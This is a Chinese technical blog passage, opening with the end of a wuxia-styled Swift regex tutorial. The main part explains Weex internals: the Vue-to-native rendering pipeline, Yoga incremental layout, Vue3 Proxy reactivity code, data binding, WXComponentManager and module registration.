侯佩挠了挠头:“你的意思是,你想找到一个模式,但这个模式必须满足它前面有一个特定的前置条件,而这个前置条件本身,又不被纳入匹配结果?”

在这里插入图片描述

“对!”王语嫣焦急万分,“我的 Regex 功夫只能‘向前看’(Lookahead),却无法完美地**‘向后看’**,我不能确定文本中这三个字前面是不是真的有‘我的挚爱’。”

侯佩望着卷轴深处那段充满秘密的代码,神秘地一笑:“王姑娘,你不用再对着旧秘籍望洋兴叹了。下一章,Swift 6.2 就要教我们一招绝顶的侦查武功:Regex lookbehind assertions(正则表达式向后查找断言)!”

在这里插入图片描述

(欲知后事如何,且看下回分解:Regex lookbehind assertions —— 如何在不匹配前文的情况下,精确判断前文的存在性,找到王语嫣真正的“挚爱”。)

Weex 底层原理与性能监控

从 Vue 组件库(Vue Lib)到 Weex 渲染为 iOS 原生 UIKit 元素,核心是 “Virtual DOM → 跨线程通信 → Native DOM 构建 → 布局计算 → 原生 View 渲染 → 事件反向绑定” 的完整链路。Weex 作为中间层,主要完成 7 大核心工作,接下去看看详细内容.

Weex 侧 APM 该怎么开展?

一、核心步骤

从 Vue Lib 到 Weex 原生 UIKit 元素的完整流程。

首先,用户的需求是 “列举 Weex 做的事情” 并 “结合最新源码标位置”,所以思考过程要先拆解流程:从 Vue 编译产物处理、JS-Native 通信、Virtual DOM 解析、DOM 构建与布局计算、渲染指令生成、原生 View 创建与更新,这几个核心步骤。每个步骤都要对应 Weex 的具体工作,还要找到最新源码中的对应类和方法。

第一步,应该是 Vue 编译产物的适配。因为 Vue 写的代码要被 Weex 识别,Weex 需要处理 Vue 的模板编译结果(比如 render 函数生成的 Virtual DOM),还要注入 Weex 的 JS Runtime API。这里要找最新源码中 JS Runtime 的初始化类,比如 WXJSContext 或 WXBridgeCore,因为 JS 环境的搭建是第一步。

第二步,JS-Native 通信的建立。Vue 的 Virtual DOM 变化需要传递给 Native,所以 Weex 的 Bridge 核心要注册通信方法(比如 callNative),这里对应 WXBridgeCore 的 invokeNative 方法,之前讨论过 bridge 队列,这里要结合最新源码中通信任务的调度。

第三步,Virtual DOM 的解析与 DOM 树构建。Weex 需要把 Vue 的 Virtual DOM(JSON 结构)解析成 Native 侧的 DOM 节点(WXDOMNode),这部分现在在 WXDOMCore 中,比如 createNode 方法,处理节点创建、属性更新,还要维护 DOM 树结构。

第四步,样式解析与 Yoga 布局计算。Vue 的样式(比如 flex)要被 Weex 解析,转换为 Yoga 的布局属性,然后在 dom 线程计算布局,这部分在 WXDOMCore 的_scheduleLayout 方法,调用 Yoga 的 calculateLayout。

第五步,渲染指令生成与传递。DOM 和布局计算完成后,要把结果封装成渲染指令(节点 ID、frame、类型等),通过主线程传递给渲染核心,这里是 WXDOMCore 的_notifyRender 方法,切换到 main queue。

第六步,原生 UIKit 元素的创建与更新。渲染核心(WXRenderCore)接收指令,创建对应 UIKit 控件(UILabel、UIImageView 等),或复用已有 View,更新 frame 和样式,这部分在 WXRenderCore 的 render 方法,还有具体的 View 工厂类(比如 WXViewFactory)。

第七步,事件绑定与反向通信。原生 UI 的事件(比如点击)要传递回 Vue,Weex 需要注册 Native 事件,通过 Bridge 回调 JS,这里对应 WXEventDispatcher 和 WXBridgeCore 的 callbackJS 方法。

具体的逻辑不做深入探讨,可以查看源码研究。

二、Yoga

1. 支持"增量布局更新"

当组件样式变化时,Yoga 仅重新计算受影响的组件树分支,而非全量重算,大幅减少 RN 应用的布局耗时和卡顿』Yoga 是如何实现仅计算受影响的组件树分支的?类似有个打标记,标记为 dirty?

Yoga 实现增量布局的核心就是 「Dirty 标记机制」+「组件树依赖传播」—— 通过标记 “受影响的节点”,并仅处理这些节点及其关联分支,避免全量重算。

1. YogaNode 与 Dirty 状态标识

Yoga 中每个组件对应一个 YogaNode(布局计算的最小单元),每个节点都包含 3 个关键状态标记(用于判断是否需要重算):

  • dirtyFlags(核心标记):记录节点的 “脏状态类型”,主要分两类:
    • LAYOUT_DIRTY:节点自身样式(如 width、flex)或子节点布局变化,需要重新计算自身布局;
    • MEASURE_DIRTY:节点的测量相关属性(如 measureFunction 自定义测量逻辑)变化,需要先重新测量尺寸,再计算布局。
  • isLayoutClean:布尔值,快速判断节点是否 “干净”(无脏状态),避免重复检查 dirtyFlags;
  • childCount + children 指针:维护子节点列表,用于后续遍历依赖分支。

2. 脏状态触发与传播:从 “变化节点” 到 “根节点” 的冒泡

当组件样式变化时(如 RN 中修改 style={{ flex: 2 }}),Yoga 会触发以下流程:

  • 步骤 1:标记自身为 Dirty 直接修改变化节点的 dirtyFlags |= LAYOUT_DIRTY(或 MEASURE_DIRTY),同时设置 isLayoutClean = false。

  • 步骤 2:向上冒泡通知父节点 由于父节点的布局(如尺寸、位置)依赖子节点的布局结果(比如父节点是 flex:1,子节点尺寸变化会影响父节点的剩余空间分配),因此会递归向上遍历父节点,直到根节点,将所有 “依赖节点” 都标记为 LAYOUT_DIRTY。 关键优化:父节点仅标记 “需要重算”,但不会立即计算,避免中途重复触发计算。

  • 步骤 3:跳过已标记的节点 若某个节点已被标记为 Dirty,后续重复触发时会直接跳过(避免重复冒泡),提升效率。

3. 布局计算阶段:只处理 Dirty 分支,跳过干净节点(DFS)

当 Yoga 触发布局计算(如 RN 渲染帧触发、组件挂载完成)时,会从根节点开始遍历组件树,但仅处理 “Dirty 节点及其子树”:

  • 步骤 1:根节点判断状态 若根节点是干净的(isLayoutClean = true),直接终止计算(全量跳过);若为 Dirty,进入分支处理。

  • 步骤 2:递归处理 Dirty 分支 对每个节点,先检查自身状态:

  • 若干净:直接复用上次缓存的布局结果(x/y/width/height),不重算;

  • 若 Dirty:

    • 先处理子节点:如果子节点是 Dirty,先递归计算子节点布局(保证父节点计算时依赖的子节点数据是最新的);
    • 再计算自身布局:根据 Flex 规则(如 flexDirection、justifyContent)和子节点布局结果,计算自身的最终尺寸和位置;
    • 清除 Dirty 标记:计算完成后,设置 dirtyFlags = 0、isLayoutClean = true,标记为干净。
  • 步骤 3:增量更新的核心效果 比如修改一个列表项的 margin,只会标记该列表项 → 父列表容器 → 根节点为 Dirty,其他列表项、页面其他组件均为干净,会直接跳过计算,仅重算 “列表项→父容器” 这一小分支。

2. Flex 布局逻辑如何到 Native 系统

Flex 布局逻辑,或者说 DSL,是如何翻译为 iOS 的 AutoLayout 和 Android 的 LayoutParams 的?

Yoga 先将 Flex DSL 解析为统一的「布局计算结果」(节点的 x/y/width/height、间距、对齐方式等),再根据平台差异,将计算结果 “映射” 为对应平台的原生布局规则——iOS 映射为 AutoLayout 约束,Android 映射为 LayoutParams + 原生布局容器属性。

1. 第一步:通用前置流程(跨平台统一)

无论 iOS 还是 Android,Yoga 都会先完成以下步骤,屏蔽 Flex DSL 的解析差异:

  1. 解析 Flex 样式:将上层框架的 Flex 配置(如 RN 的 StyleSheet、Weex 的模板样式)解析为 YogaNode 的属性(如 flexDirection、justifyContent、margin、padding 等);
  2. 执行布局计算:通过 Flexbox 算法(基于 Web 标准),计算出每个 YogaNode 的最终布局数据:
  • 固定属性:width/height(含 auto/flex 计算后的具体数值)、x/y(相对父节点的坐标);
  • 间距属性:marginLeft/Top/Right/Bottom、paddingLeft/Top/Right/Bottom;
  • 对齐属性:alignItems、justifyContent 对应的节点相对位置关系;
  1. 输出标准化布局数据:将上述结果封装为平台无关的结构体,供后续平台映射使用。

2. 第二步:iOS 端:映射为 AutoLayout 约束(NSLayoutConstraint)

AutoLayout 的核心是「基于约束的关系描述」(而非直接设置坐标),因此 Yoga 会将 “计算出的具体尺寸 / 位置” 转化为 UIView 的约束(NSLayoutConstraint),核心映射规则如下:一一翻译 css 规则到 iOS AutoLayout 写法:

Flex 核心属性 对应的 AutoLayout 约束逻辑
width: 100 映射为 view.widthAnchor.constraint(equalToConstant: 100)
height: auto 先通过 Yoga 计算出具体高度(如文字高度、子节点包裹高度),再映射为 heightAnchor 约束;若为 flex:1,则映射为 heightAnchor.constraint(equalTo: superview.heightAnchor, multiplier: 1)(占满父容器剩余高度)
marginLeft: 20 映射为 view.leadingAnchor.constraint(equalTo: superview.leadingAnchor, constant: 20)
marginTop: 15 映射为 view.topAnchor.constraint(equalTo: superview.topAnchor, constant: 15)
justifyContent: center(父节点 flexDirection: row) 父节点约束:view.centerXAnchor.constraint(equalTo: superview.centerXAnchor);若有多个子节点,通过调整子节点间的 spacing 约束实现均匀分布
alignItems: center(父节点 flexDirection: column) 子节点约束:view.centerYAnchor.constraint(equalTo: superview.centerYAnchor)
flex: 1(子节点) 映射为 view.widthAnchor.constraint(equalTo: superview.widthAnchor, multiplier: 1)(横向占满)+ 父节点的 distribution 约束(分配剩余空间)

补充信息:

  • Yoga 会为每个 UIView 关联一个 YogaNode,布局计算完成后,通过 YogaKit(或上层框架如 RN 的原生层)自动生成约束;
  • 支持 “约束优先级” 适配:比如 flex:1 对应的约束优先级会高于固定尺寸约束,确保 Flex 规则优先生效;
  • 混合布局兼容:若原生视图已有部分 AutoLayout 约束,Yoga 会生成 “补充约束”,避免冲突(通过 active属性控制约束启用 / 禁用)。

三、Weex 剖析

sequenceDiagram
    participant V as Vue组件
    participant J as JS Framework
    participant B as JS-Native Bridge
    participant N as Native引擎
    participant P as 原生UI

    V->>J: .vue单文件 (template/style/script)
    Note right of J: 编译阶段<br>weex-loader编译Vue组件
    J->>J: 生成Virtual DOM树
    Note right of J: 运行阶段<br>JS Framework管理VNode生命周期
    J->>B: 通过callNative发送<br>渲染指令JSON
    Note right of B: 通信层<br>将JS调用转为原生模块调用
    B->>N: 传递渲染指令
    Note right of N: 原生渲染引擎<br>WXRenderManager (Android)<br>WXComponent (iOS)
    N->>N: 解析指令,创建/更新组件树
    N->>P: 调用原生API渲染<br>(e.g., UIView, TextView)
    P->>P: 最终原生视图

下面针对核心机制详解与源码定位

1. 编译阶段:从 Vue 到 Virtual DOM

  • 处理 Vue 单文件:开发者的.vue文件通过 Webpack 和 weex-loader 编译成 JavaScript Bundle。这个 Bundle 包含了渲染页面所需的所有信息
  • 生成Virtual DOM:在JS运行时,Vue.js(或 Rax)的渲染函数会生成一棵 Virtual DOM树(VNode)。Weex 的 JS Framework 会拦截常规的 DOM 操作,将其导向 Weex 的渲染管道

源码相关:编译过程主要涉及 weex-loader (在 weex-toolkit 项目中),而 JS Framework 对 VNode 的处理在 js-framework 目录下。重点关注 src/framework.js 中的 DocumentElement 类,它们模拟了 DOM 结构

2. 指令生成与通信

  • 序列化为渲染指令(json 数据):JS-Framework 不会直接操作 Dom,而是把对 Dom 的操作,描述成对 VNode 对象的创建、更新、删除等,序列化成一种特殊的 JSON 格式的渲染指令。比如

    {
      "module": "dom",
      "method": "createBody",
      "args": [{"ref": "1", "type": "div", "style": {...}}]
    }
    
  • JS-Native 桥接:这些指令通过 callNative 方法,从 JS 端发送到 Native 端,同时 Native 端也可以通过 callJS 方法向 JS 端发送事件(比如用户点击)

3. 原生端渲染

  • 指令解析与组件渲染:Native 端的渲染引擎(如 Android 的 WXRenderManger 和 iOS 的 WXComponentManager)接收并解析 JS 指令。Weex 维护了一个从 JS 组件到原生 UI 组件的映射表。(例如 映射到 iOS 的 UILabel)
  • 布局与样式:Weex 使用的 Flexbox 布局模型做为统一的布局方案,Native 端需要将 JS 传递的 css 样式属性,转换为原生组件能够理解的布局参数与样式属性。
  • 多线程模型:为了保证 UI 流畅,Weex 采用了多线程模型。DOM 操作和布局计算通常在单独的 DOM 线程进行,而最终创建和更新原生视图的操作必须在 UI 主线程上进行

4. 拓展机制

  • 模块(Module):用于暴露原生能力(如网络、存储)给前端调用,通过 callNative 触发,支持回调
  • 组件(Component):拓展自定义 UI 组件,允许开发者创建自定义的原生 UI 组件,并在 JSX 中使用
  • 适配器(Adapter):提供可替换的实现,如图片下载器

四、为什么自定义 Component 都需要继承自 WXComponent?

比如下面的代码

[self registerComponent:@"image" withClass:NSClassFromString(@"WXImageComponent") withProperties:nil];

@interface WXImageComponent : WXComponent

@end

答:自定义原生组件必须继承自 WXComponent,本质是复用 Weex 封装的「JS - 原生交互、生命周期、样式布局、渲染基础」等通用能力,确保组件能接入 Weex 运行时生态

Weex Module 与 Componet 的区别

类型 核心作用 基类 示例
Component 原生 UI 渲染(有视图) WXComponent WXImageComponent(图片)、WXTextComponent(文本)、自定义按钮组件
Module 功能扩展(无视图) WXModule WXNavigatorModule(导航)、WXStorageModule(存储)、自定义工具模块

实现 JS 与原生组件的「数据同步」(属性、事件、方法)

Weex 的核心是「JS 控制原生组件」,而 WXComponent 封装了 JS 与原生之间的通信协议,无需自定义组件手动处理:

  • 属性同步(Props):JS 端通过 <my-component prop1="xxx" prop2="yyy"> 传递的属性,WXComponent 会自动解析、类型转换(如 JS 字符串 → 原生 NSString/NSNumber),并通过 setter 方法同步到自定义组件。

    示例:WXImageComponent 继承 WXComponent 后,只需重写 -setSrc:(NSString*)src 方法,就能接收 JS 传的 src 属性,无需关心「JS 如何把值传给原生」。

  • 事件分发(Events):原生组件的交互事件(如点击、加载完成),WXComponent 会按照 Weex 协议回传给 JS 端(如 @emit('click') )

    示例:自定义按钮组件继承后,只需调用 [self fireEvent:@"click" params:@{@"x": @100, @"y": @200}] ,JS 端就能通过 @onclick接收事件,无需自己实现事件通信。

  • 方法调用(Methods):JS 端通过 this.$refs.myComponent.callMethod('xxx', params) 调用原生组件方法,WXComponent

    会解析方法名和参数,反射调用自定义组件的对应方法。

    示例:自定义播放器组件继承后,只需暴露 -play方法,JS 就能直接调用,WXComponent负责方法查找和参数传递。

五、JS 数据变化是如何驱动 Native UI 更新的

纯 Web 端的数据变化会通过 Proxy 去驱动关联的 UI 更新,这也是 Vue3 的工作原理,那么 JS 端的数据变化是如何驱动 Native UI 组件的更新的?

所有的 Native UI Component 都继承自 WXComponent,所以可以直接给 WXComponent 添加一个实现 DataBinding 的 Category,这就是 Weex 最新源码中的 WXComponent+DataBinding.mm

核心是:解析 JS 端传递的「绑定表达式」(如 {{a + b}}),编译为原生可执行的回调 Block,当 JS 数据变化时,通过 Block 计算出组件所需的新值,自动更新组件的属性、样式、事件,或处理列表(v-for)、条件(v-if)、一次性绑定(v-once)等逻辑

可能有些人要问了:为什么当 js 数据变化时,需要让 Native 计算组件所需的新值?这不就是 Native 做了一遍 Vue 响应式的逻辑吗?这种重复逻辑的价值是什么?

Vue3 的 Proxy 只负责「JS 端数据变化的监听 + 依赖收集 + 触发更新通知」—— 它是 “响应式的触发器”,而非 “UI 更新的执行者”

而 Weex 之所以需要 Native 托管,核心是因为「继承自 WXComponent 的 UI 组件是 Native 侧的原生组件,而非 DOM 组件」,JS 端没有任何能力(API)去访问、操作他们,Proxy 再强大,它也只是 Native 侧(Weex)和 Web 端(Vue)负责“喊一声,哎,数据变了,你们谁需要的自助,自己去处理感兴趣的 UI”,却摸不到 UI 组件,Web 端由 DOM API 去渲染绘制,Native 端更触碰不到,必须由 Native 自己来完成:听到通知 -> 计算新值 -> 更新控件的流程。

1. Proxy 都做了些什么?

Vue3 的核心实现里 Proxy 做了3件事:全程在 JS 侧,不涉及任何 UI 操作

监听数据操作:通过 Proxy 代理对象拦截数据的 getter、setter

  • 通过 getter 收集依赖关系:当组件渲染时触发 getter,Proxy 会记录这个组件依赖了这个数据
  • 通过 setter 触发更新通知:当数据被修改时触发 setter,Proxy 会告诉 Vue 运行时,“user.name” 变了,所有依赖它的组件该更新了

Proxy(代理)是 ES6 新增的内置对象,用于创建一个对象的代理副本,并通过「陷阱(Trap)」拦截对原对象的基本操作(如属性访问、赋值、删除等),从而自定义这些操作的行为。

const proxy = new Proxy(target, handler);
  • target:被代理的原始对象(可以是对象、数组,甚至函数);
  • handler:配置对象,包含多个「陷阱方法」(如 getset),用于定义拦截逻辑;
  • proxy:代理对象,后续对原始对象的操作需通过代理对象进行,才能触发拦截。
陷阱方法 作用 触发场景
get(target, key, receiver) 拦截「属性访问」 proxy.keyproxy[key]
set(target, key, value, receiver) 拦截「属性赋值」 proxy.key = valueproxy[key] = value
deleteProperty(target, key) 拦截「属性删除」 delete proxy.key
has(target, key) 拦截「in 运算符判断」 key in proxy

Tips: Proxy 代理的是「整个对象」,而非单个属性,且拦截的是「操作行为」(如 “访问属性” 这个动作),而非属性本身。

Vue 核心流程:创建代理 → 依赖收集 → 数据修改 → 触发更新

1. 创建代理(reactive 函数的核心)

reactive 函数接收一个原始对象,返回其 Proxy 代理对象,同时配置 getset 等陷阱方法,为后续依赖收集和更新做准备

function reactive(target) {
  return new Proxy(target, {
    // 拦截属性访问
    get(target, key, receiver) {
      // 1. 先获取原始属性值
      const value = Reflect.get(target, key, receiver);
      // 2. 收集依赖(关键:记录“谁在访问这个属性”)
      track(target, key);
      // 3. 若访问的是嵌套对象,递归创建代理(懒代理,优化性能)
      if (typeof value === 'object' && value !== null) {
        return reactive(value);
      }
      return value;
    },
    // 拦截属性赋值
    set(target, key, value, receiver) {
      // 1. 先设置原始属性值
      const oldValue = Reflect.get(target, key, receiver);
      const success = Reflect.set(target, key, value, receiver);
      // 2. 若值发生变化,触发依赖更新
      if (success && oldValue !== value) {
        trigger(target, key);
      }
      return success;
    },
    // 拦截属性删除
    deleteProperty(target, key) {
      const success = Reflect.deleteProperty(target, key);
      if (success) {
        trigger(target, key); // 删除属性也触发更新
      }
      return success;
    }
  });
}
  • Reflect 操作原始对象,Reflect 是 ES6 新增的内置对象,提供了与 Proxy 陷阱对应的方法,比如 Relect.getReflect.set 确保操作原始对象的行为一直,同时避免直接操作 target 所产生的问题
  • 嵌套对象懒代理:Proxy 仅代理当前层级对象,当访问嵌套对象 (proxy.user.name)时,才递归对 user 对象创建代理,避免初始化时递归遍历所有属性,优化性能

2. 依赖收集

Vue3 用「三层映射」存储依赖,确保精准定位

// WeakMap:key 是被代理的原始对象(target),value 是该对象的属性-依赖映射
const targetMap = new WeakMap();

function track(target, key) {
  // 1. 若没有当前目标对象的映射,创建一个(Map:key 是属性名,value 是依赖集合)
  if (!targetMap.has(target)) {
    targetMap.set(target, new Map());
  }
  const depsMap = targetMap.get(target);

  // 2. 若没有当前属性的依赖集合,创建一个(Set:存储依赖函数,去重)
  if (!depsMap.has(key)) {
    depsMap.set(key, new Set());
  }
  const deps = depsMap.get(key);

  // 3. 将当前活跃的依赖函数(effect)添加到集合中
  if (activeEffect) {
    deps.add(activeEffect);
  }
}

会产生一个这样的结构

{
""
}

3. 数据修改(触发 set/deleteProperty 的陷阱)

当通过代理对象修改属性(如 proxy.name = 'newName')或删除属性(如 delete proxy.age)时,会触发对应的 Proxy 陷阱(setdeleteProperty)。

陷阱函数会先更新原始对象的属性值,再判断值是否真的发生变化(避免无效更新)

4. 触发更新 (tigger 函数)

function trigger(target, key) {
  // 1. 从 targetMap 中获取当前对象的属性-依赖映射
  const depsMap = targetMap.get(target);
  if (!depsMap) return;

  // 2. 获取当前属性的所有依赖
  const deps = depsMap.get(key);
  if (!deps) return;

  // 3. 执行所有依赖函数(触发更新)
  deps.forEach(effect => effect());
}

2. Proxy 不做的事情

  • 不计算表达式(比如 user.name + "后缀"的结果,Proxy 不管)
  • 不操作 UI(不管是 DOM 和 Native 控件,Proxy 都不碰)
  • 不跨端通信

为什么 Native 组件不能让 Proxy “解决”?

核心矛盾:渲染载体不同。Proxy 之所以在 Web 端能 “间接驱动 UI”,是因为 Web 端有个「中间桥梁」—— DOM,且 JS 端有完整的 DOM API(比如 document.getElementByIdelement.style.setProperty):

Web 端完整链路:Proxy 触发更新 → Vue 运行时计算表达式 → 虚拟 DOM diff → 调用 DOM API 操作 DOM → UI 更新

  • JS 端没有操作 Native 控件的 API:浏览器给 JS 暴露了 DOM API,但 iOS/Android 系统不会给 JS 引擎暴露 “修改 UILabel 文本”“设置 UIImageView 图片” 的 API —— JS 端连 Native 控件的 “引用” 都拿不到,更别说更新了;
  • Native 控件不在 JS 运行时的内存空间:JS 引擎(如 V8、JSC)和 Native 应用是两个独立的 “进程 / 虚拟机”,内存不共享 —— Proxy 所在的 JS 内存里,根本没有 Native 控件的实例,想操作都无从下手

Weex 的设计优雅之处在于:Native 托管“执行层”,Proxy 保留“触发层”。响应式工作继续复用现有逻辑,由 Proxy 完成,最后的执行层由 Native 实现,也就是 WXComponent+DataBinding

  • 响应式系统(Proxy)的核心是 “发现变化”:不管是 Web 还是 Weex,Proxy 都只干这件事;
  • UI 更新的核心是 “操作渲染载体”:Web 端操作 DOM(JS 端能做),Weex 端操作 Native 控件(只能 Native 端做);
  • WXComponent+DataBinding 的角色是 “Native 端的 UI 执行器”:它不是替代 Proxy,而是 Proxy 触发更新后,负责把 “更新通知” 落地到 Native 控件上的唯一途径

六、Weex 自定义组件是如何工作的

上面分析了自定义组件的数据变化和表达式运算是 Native 负责的,执行层也就是 WXComponent+DataBinding.mm 这个类。

一言以蔽之就是:把 JS 端传递的“原始数据”,通过预编译的绑定规则(Block)计算出 Native 组件需要的最终值,并自动更新 UI 组件,同时适配长列表组件等复杂场景的 UI 优化。

该分类为所有继承自 WXComponent 的组件,注入“数据绑定能力”,无需手动实现。

1. 绑定规则的“编译存储”,把 JS 表达式转换为 Native 可执行的 block

数据绑定的「前置准备」:在组件初始化时,解析 JS 端传递的绑定规则(如 [[user.name]][[repeat]]),编译为 Native 可执行的 WXDataBindingBlock(代码块),并存储到组件的绑定映射表中(_bindingProps/_bindingStyles/_bindingEvents 等)

- (void)_storeBindingsWithProps:(NSDictionary *)props styles:(NSDictionary *)styles attributes:(NSDictionary *)attributes events:(NSDictionary *)events;

接收组件的 props/attrbutes/styles/events 中的绑定规则,解析并存储为可执行的 block。

  1. 识别绑定表达式:判断是否包含 WXBindingIdentify@"@binding")标记,比如 {"src": {"@binding": "user.name"}}
  2. AST 解析:通过 WXJSASTParser 把绑定表达式字符串(如 "user.name + '后缀'")解析为 AST 节点(WXJSExpression);
  3. 生成执行 Block:调用 -bindingBlockWithExpression: 把 AST 节点转成 WXDataBindingBlock(后续数据变化时直接执行该 Block 计算结果);
  4. 分类存储:按绑定类型(属性 / 样式 / 事件 / 特殊绑定)存入对应的映射表:
    • _bindingProps:属性绑定(如 src);
    • _bindingStyles:样式绑定(如 fontSize);
    • _bindingEvents:事件绑定(如 onClick 参数);
    • 特殊绑定:_bindingRepeat[[repeat]] 对应 v-for)、_bindingMatch[[match]] 对应 v-if)、_dataBindOnce[[once]] 对应 v-once)。

2. WXComponentManager 都做了什么

WXComponentManager 是 Weex iOS 端的 组件全生命周期与任务调度核心,所有与 Native 组件相关的操作(创建、更新、布局、销毁、事件绑定)都由它统一管理,同时承担「线程分工协调、UI 任务批量处理、性能监控」等关键职责,是连接 JS 指令、Native 组件、布局引擎和 UI 渲染的 “中枢大脑”。

1. 组件线程管理

组件业务的 “专属执行环境”,作为组件线程的「创建者和维护者」,WXComponentManager 确保所有组件核心操作都在全局唯一的组件线程中执行,避免线程安全问题和主线程阻塞。

核心工作:

  • 懒加载创建全局组件线程(+componentThread),启动 RunLoop 确保线程常驻(_runLoopThread
  • 提供线程调度接口:WXPerformBlockOnComponentThread(异步)、WXPerformBlockSyncOnComponentThread(同步),让外部模块(如 WXBridgeManager)能将组件任务提交到组件线程
  • 线程断言约束:所有组件核心方法(如 createBodyupdateStyles)开头都有 WXAssertComponentThread,强制组件操作在组件线程执

2. 组件树构建与管理:组件的 “增删改查” 全生命周期

核心工作:

  • 创建组件
    • 根组件创建(createBody:):接收 JS 端根组件指令,创建页面根组件(如 <div> 根节点),绑定到页面根视图;
    • 子组件创建(addComponent:type:parentRef:):根据 JS 端指令,创建子组件并关联父组件,存入 _indexDict(组件 ref → 实例映射,快速查找)。
  • 更新组件关系
    • 移动组件(moveComponent:toSuper:atIndex:):调整组件在组件树中的位置,同步更新视图层级;
    • 删除组件(removeComponent:):从组件树和索引字典中移除组件,递归删除子组件,释放视图资源。
  • 组件查询与遍历
    • 按 ref 查找组件(componentForRef:):供 JS 端 this.$refs 访问原生组件实例;
    • 遍历组件树(enumerateComponentsUsingBlock:):支持递归遍历所有组件(如性能统计、全局样式更新)

3. 数据绑定辅助:绑定规则的提取与存储

配合 WXComponent+DataBinding 模块,WXComponentManager 在组件创建时,从 JS 端传递的 props/styles/attributes 中提取「绑定表达式配置」,为响应式更新铺路。核心工作:

  • 提取绑定规则:
    • _extractBindings::从样式 / 属性中提取 [[repeat]]/{"@binding": "expr"} 等绑定配置,移除原始字典中的绑定字段(避免干扰普通属性处理)
    • _extractBindingEvents::从事件数组中提取绑定参数(如 onClick 的回调表达式);
    • _extractBindingProps::提取组件自定义 props 绑定(@componentProps)。
  • 存储绑定规则:调用组件的 _storeBindingsWithProps:styles:attributes:events:,将提取的绑定配置存入组件实例,后续数据变化时触发表达式计算。

4. 组件更新调度:样式 / 属性 / 事件的 “同步与执行”

当 JS 端触发组件更新(如修改样式、属性、绑定事件)时,WXComponentManager 负责「跨线程调度、数据预处理、UI 同步」,确保更新流程高效且安全。

  • 样式更新(updateStyles:forComponent:
    • 组件线程:过滤无效样式(如空值),更新组件实例的样式数据,触发布局计算;
    • 主线程:通过 _addUITask 将样式更新任务(如设置 CALayer.backgroundColorUILabel.font)批量调度到主线程执行。
  • 属性更新(updateAttributes:forComponent::类似样式更新,组件线程处理数据逻辑,主线程更新原生组件属性(如 UIImageView.imageUIScrollView.contentOffset)。
  • 事件绑定 / 解绑
    • 组件线程:维护组件的事件列表(如 click/scroll);
    • 主线程:绑定 / 移除原生手势识别器(如 UITapGestureRecognizer),捕获用户交互。
  • 批量更新优化:通过 performBatchBegin/performBatchEnd 标记批量更新范围,合并多个 UI 任务,减少主线程调度次数(提升性能)。

5. 布局调度与 UI 同步:从布局计算到 UI 渲染

Weex 采用 Flex 布局引擎(Yoga),WXComponentManager 负责布局计算的触发、组件 frame 分配、UI 任务批量执行,确保组件按预期位置渲染。

  • 触发布局计算:组件更新、根视图尺寸变化(rootViewFrameDidChange:)时,调用 _layoutAndSyncUI 触发 WXCoreBridge 执行 Yoga 布局计算,得到所有组件的 frame。
  • 分配组件 frame:layoutComponent:frame:isRTL:innerMainSize: 将计算后的 frame 分配给组件,若为根组件,同步更新页面根视图尺寸(适配 wrap_content 模式)。
  • UI 任务同步:_syncUITasks 批量执行 _uiTaskQueue 中的 UI 任务(如 addSubviewsetFrame),异步调度到主线程,避免频繁主线程切换导致掉帧。
  • 帧率同步:通过 WXDisplayLinkManager 监听屏幕刷新率(60fps),确保布局更新与帧率同步,提升渲染流畅度。

6. 生命周期与资源释放:页面卸载时的 “清理工作”

当 Weex 页面销毁(WXSDKInstance 卸载)时,WXComponentManager 负责清理组件资源,避免内存泄漏。

核心工作(unload 方法):

  • 停止布局调度:调用 _stopDisplayLink,停止帧率监听和布局计算;
  • 解绑渲染资源:遍历所有组件,解除与底层渲染对象(RenderObject)的绑定;
  • 释放 UI 资源:调度到主线程,销毁所有组件的原生视图(_unloadViewWithReusing:);
  • 清空状态:清空 _indexDict_uiTaskQueue_fixedComponents 等容器,解除与 WXSDKInstance的绑定。
  • 清除事件绑定:清除所有的事件、手势等逻辑

七、WXModule 的注册机制及其调用流程

sequenceDiagram
    participant JS as JS环境
    participant B as WXBridge
    participant MF as WXModuleFactory
    participant MM as WXModuleManager
    participant MI as Module实例
    participant MC as 自定义Module

    Note over JS,MC: 注册阶段
    MC->>+MF: registerModule("customModule", MyModule.class)
    MF->>MF: 生成ModuleFactory并缓存
    MF->>MF: 反射解析@JSMethod方法
    MF->>B: 将模块&方法信息传递给JS

    Note over JS,MC: 调用阶段
    JS->>+B: weex.requireModule('customModule').myMethod(args)
    B->>+MM: 调用 invokeModuleMethod
    MM->>+MF: 获取Module实例和方法Invoker
    MF->>MF: 查找/创建Module实例
    MF->>MF: 获取方法Invoker
    MF->>MM: 返回实例和Invoker
    MM->>+MI: 通过Invoker.invoke调用
    MI->>+MC: 执行原生方法实现
    MC->>JS: 通过callback回调JS(可选)

1. WXModule 的注册分为 Naitve 注册和 JS 注册

  • Native 注册:在 Native 端,调用 [WXSDKEngine registerModule:withClass:] 方法(在 iOS 中) ,这个过程会将自定义 Module 的类和一个模块名称(例如 TestModule)建立映射关系,并生成一个 ModuleFactory 存储在一个全局的 Map(例如 sModuleFactoryMap)中。同时,如果该 Module 被标记为全局(global),SDK 会立即创建一个实例并缓存起来。
  • JS 注册:Native 注册完成后,Weex 会将所有已注册 Module 的模块名称及其暴露给 JS 的方法名列表,通过 WXBridge(JS-Native 通信桥梁)传递给 JS 引擎。这样,JS 端就知道存在哪些模块以及每个模块有哪些方法可以调用。

2. 当 JS 调用 Module 方法时

  • JS 发起调用:在 JS 代码中,通过 weex.requireModule('moduleName') 获取模块实例 。然后吊影其方法,比如 'staream.fetch()options, callack)'
  • Bridge 桥接:JS 引擎通过 JSBridge 将这次调用(包括模块名、方法名、参数等信息)传递给 Native 段
  • Native 端查找与执行:Native 端的 WXModuleManager 根据模块名从之前注册的工厂中获取创建的 Module 实例,并根据方法名找到对应的 MethodInvoker。MethodInvoker 会通过反射手段调用具体的 Native 方法
  • 结果回调:如果有需要,Native 可以通过 WXModuleCallBack 或者 WXModuleKeepAliveCallBack 将结果回调给 JS。WXModuleCallback 只能回调1次,而 WXModuleKeepAliveCallback 可以多次回调

3. WXModuleProtocol 的作用

WXModuleProtocol 是一个协议,定义了 Module 的行为规范。你的自定义 Module 必须遵循此协议。它声明了 Module 需要实现的方法或属性,例如如何暴露方法给 JS(通过 WX_EXPORT_METHOD 宏)、方法在哪个线程执行(通过实现特定的方法返回目标线程,例如 targetExecuteThread)、以及如何通过 weexInstance 属性弱引用持有它的 WXSDKInstance 实例。 通过遵循 WXModuleProtocol,你自定义的 Module 就能被 Weex SDK 正确识别和调

4. WXModuleFactory 的作用

  1. 存储配置:在注册阶段,它会缓存 Module 的配置信息,例如模块名和对应的工厂类(WXModuleConfig)。
